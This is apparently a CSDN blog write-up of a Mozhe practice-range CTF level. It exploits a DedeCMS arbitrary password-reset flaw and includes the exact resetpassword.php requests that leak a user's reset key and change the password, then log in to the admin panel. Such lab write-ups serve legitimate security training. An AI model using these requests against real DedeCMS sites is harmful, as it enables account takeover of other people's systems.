墨者靶场 初级:CMS系统漏洞分析溯源(第7题)

墨者靶场 初级:CMS系统漏洞分析溯源(第7题)

题目

在这里插入图片描述

背景介绍

安全工程师对某即将上线的网站进行授权测试,发现是DEDECMS,请帮助工程师完成测试。

实训目标

1、掌握此版本任意用户密码重置漏洞利用;
2、了解漏洞形成原因使用方法;

解题方向

通过漏洞查看已存在账号的资料,获得管理员后台。

解题步骤

启动靶机,访问链接,发现有两个已存在的用户admin和test。
在这里插入图片描述
任意用户密码重置漏洞存在于/member/resetpassword.php
在这里插入图片描述
使用burp抓包,修改get参数,偷取admin的key值。

http://219.153.49.228:41801/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1	
//id=1就是用户admin

在这里插入图片描述
在这里插入图片描述
把key值加载get参数后面,就可以修改admin密码了。

http://219.153.49.228:41801/member/resetpassword.php?dopost=getpasswd&id=1&key=x6akc9GX

在这里插入图片描述
但是我们发现admin不合法,于是重复步骤,去修改test用户的密码,就是把id改成2就行。
在这里插入图片描述
test会员登录进去,寻找后台登录密码,发现有个邮箱,可能是后台密码。
在这里插入图片描述
在这里插入图片描述
去到织梦的的登录页面/dede/login.php,尝试登录。
在这里插入图片描述
成功进入后台,寻找key文件,发现key值。
在这里插入图片描述
在这里插入图片描述
提交key值,完工。

发布了148 篇原创文章 · 获赞 19 · 访问量 3641

猜你喜欢

转载自blog.csdn.net/qq_43233085/article/details/104030960
今日推荐